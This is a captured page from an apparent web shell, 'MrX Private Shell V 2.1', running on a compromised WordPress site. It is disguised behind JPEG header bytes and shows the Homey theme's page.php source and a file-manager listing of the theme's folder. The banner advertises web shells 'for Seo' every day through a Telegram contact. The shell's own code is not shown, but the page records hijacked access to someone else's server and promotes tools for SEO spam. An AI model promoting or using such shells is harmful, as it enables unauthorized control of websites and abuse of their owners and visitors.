����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* The template for displaying all pages
*
* @package Homey
* @since Homey 1.0
* @author Waqas Riaz
**/
get_header();
global $post;
$sidebar_meta = homey_get_sidebar_meta($post->ID);
$sticky_sidebar = homey_option('sticky_sidebar');
if($sidebar_meta['homey_sidebar'] != 'yes') {
$content_classes = 'col-xs-12 col-sm-12 col-md-12 col-lg-12';
} elseif($sidebar_meta['homey_sidebar'] == 'yes' && $sidebar_meta['sidebar_position'] == 'right') {
$content_classes = 'col-xs-12 col-sm-12 col-md-8 col-lg-8';
$sidebar_classes = 'col-xs-12 col-sm-12 col-md-4 col-lg-4';
} elseif($sidebar_meta['homey_sidebar'] == 'yes' && $sidebar_meta['sidebar_position'] == 'left') {
$content_classes = 'col-xs-12 col-sm-12 col-md-8 col-lg-8 col-md-push-4 col-lg-push-4';
$sidebar_classes = 'col-xs-12 col-sm-12 col-md-4 col-lg-4 col-md-pull-8 col-lg-pull-8';
}
?>
<section class="main-content-area">
<div class="container">
<div class="row">
<div class="col-xs-12 col-sm-9 col-md-9 col-lg-9">
<div class="page-title">
<div class="block-top-title">
<?php get_template_part('template-parts/breadcrumb'); ?>
<h1 class="listing-title"><?php the_title(); ?></h1>
</div><!-- block-top-title -->
</div><!-- page-title -->
</div>
</div><!-- .row -->
</div><!-- .container -->
<div class="container">
<div class="row">
<div class="<?php echo esc_attr($content_classes); ?>">
<div class="page-wrap">
<div class="article-main">
<?php
// Start the loop.
while ( have_posts() ) : the_post();
// Include the page content template.
get_template_part( 'content', 'page' );
// If comments are open or we have at least one comment, load up the comment template.
if ( comments_open() || get_comments_number() ) :
comments_template();
endif;
// End the loop.
endwhile;
?>
</div>
</div><!-- grid-listing-page -->
</div>
<?php if($sidebar_meta['homey_sidebar'] == 'yes') { ?>
<div class="<?php echo esc_attr($sidebar_classes); if( $sticky_sidebar['page_sidebar'] > 0 ){ echo ' homey_sticky'; }?>">
<div class="sidebar">
<?php get_sidebar(); ?>
</div>
</div>
<?php } ?>
</div><!-- .row -->
</div> <!-- .container -->
</section><!-- main-content-area listing-page grid-listing-page -->
<?php get_footer(); ?>| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| css | Folder | 0755 |
|
|
| fonts | Folder | 0755 |
|
|
| framework | Folder | 0755 |
|
|
| images | Folder | 0755 |
|
|
| img | Folder | 0755 |
|
|
| inc | Folder | 0755 |
|
|
| js | Folder | 0755 |
|
|
| languages | Folder | 0755 |
|
|
| single-experience | Folder | 0755 |
|
|
| single-listing | Folder | 0755 |
|
|
| single-post | Folder | 0755 |
|
|
| template | Folder | 0755 |
|
|
| template-parts | Folder | 0755 |
|
|
| vc_templates | Folder | 0755 |
|
|
| woocommerce | Folder | 0755 |
|
|
| .DS_Store | File | 6 KB | 0644 |
|
| 404.php | File | 1.23 KB | 0644 |
|
| archive-experience.php | File | 4.34 KB | 0644 |
|
| archive-hm_homey_memberships.php | File | 2.05 KB | 0644 |
|
| archive-listing.php | File | 4.22 KB | 0644 |
|
| archive.php | File | 2.16 KB | 0644 |
|
| author.php | File | 369 B | 0644 |
|
| comments.php | File | 2.85 KB | 0644 |
|
| content-grid.php | File | 1.54 KB | 0644 |
|
| content-list.php | File | 899 B | 0644 |
|
| content-none.php | File | 1.39 KB | 0644 |
|
| content-page.php | File | 968 B | 0644 |
|
| content.php | File | 1.42 KB | 0644 |
|
| custom_periods_auto_renewl_for_next_year.php | File | 10.26 KB | 0644 |
|
| footer.php | File | 2.12 KB | 0644 |
|
| functions.php | File | 86.62 KB | 0644 |
|
| header.php | File | 5.38 KB | 0644 |
|
| index.php | File | 1.92 KB | 0644 |
|
| localization.php | File | 42.9 KB | 0644 |
|
| page.php | File | 2.64 KB | 0644 |
|
| screenshot.png | File | 282.37 KB | 0644 |
|
| search.php | File | 1.92 KB | 0644 |
|
| searchform.php | File | 320 B | 0644 |
|
| sidebar-experience.php | File | 654 B | 0644 |
|
| sidebar-listing.php | File | 640 B | 0644 |
|
| sidebar.php | File | 649 B | 0644 |
|
| single-experience.php | File | 2.21 KB | 0644 |
|
| single-hm_homey_memberships.php | File | 41.63 KB | 0644 |
|
| single-listing.php | File | 3.47 KB | 0644 |
|
| single.php | File | 5.63 KB | 0644 |
|
| style.css | File | 8.02 KB | 0644 |
|
| taxonomy-experience_amenity.php | File | 216 B | 0644 |
|
| taxonomy-experience_area.php | File | 209 B | 0644 |
|
| taxonomy-experience_city.php | File | 209 B | 0644 |
|
| taxonomy-experience_country.php | File | 209 B | 0644 |
|
| taxonomy-experience_facility.php | File | 209 B | 0644 |
|
| taxonomy-experience_language.php | File | 209 B | 0644 |
|
| taxonomy-experience_state.php | File | 209 B | 0644 |
|
| taxonomy-experience_type.php | File | 209 B | 0644 |
|
| taxonomy-listing_amenity.php | File | 215 B | 0644 |
|
| taxonomy-listing_area.php | File | 215 B | 0644 |
|
| taxonomy-listing_city.php | File | 215 B | 0644 |
|
| taxonomy-listing_country.php | File | 215 B | 0644 |
|
| taxonomy-listing_facility.php | File | 215 B | 0644 |
|
| taxonomy-listing_state.php | File | 215 B | 0644 |
|
| taxonomy-listing_type.php | File | 215 B | 0644 |
|
| taxonomy-room_type.php | File | 215 B | 0644 |
|
| wpml-config.xml | File | 15.61 KB | 0644 |
|